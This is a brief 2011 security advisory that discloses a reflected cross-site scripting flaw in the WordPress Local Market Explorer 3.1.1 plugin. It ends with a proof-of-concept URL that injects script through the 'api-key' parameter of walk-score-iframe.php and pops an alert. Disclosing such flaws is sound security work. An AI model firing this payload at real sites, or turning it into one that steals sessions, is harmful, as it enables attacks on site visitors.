WordPress Local Market Explorer 3.1.1 Reflected Cross-site Scripting

------------------------------------------------------------------------
Software................WordPress Local Market Explorer 3.1.1
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://wordpress.org/extend/plugins/local-market-explorer/
Discovery Date..........2/23/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in WordPress Local
Market Explorer 3.1.1 can be exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/wordpress/wp-content/plugins/local-market-explorer/modules/walk-score-iframe.php?api-key=';%3C/script%3E%3Cscript%3Ealert(0)%3C%2fscript%3E%3Cscript%3Evar%20x%20=%20'&location=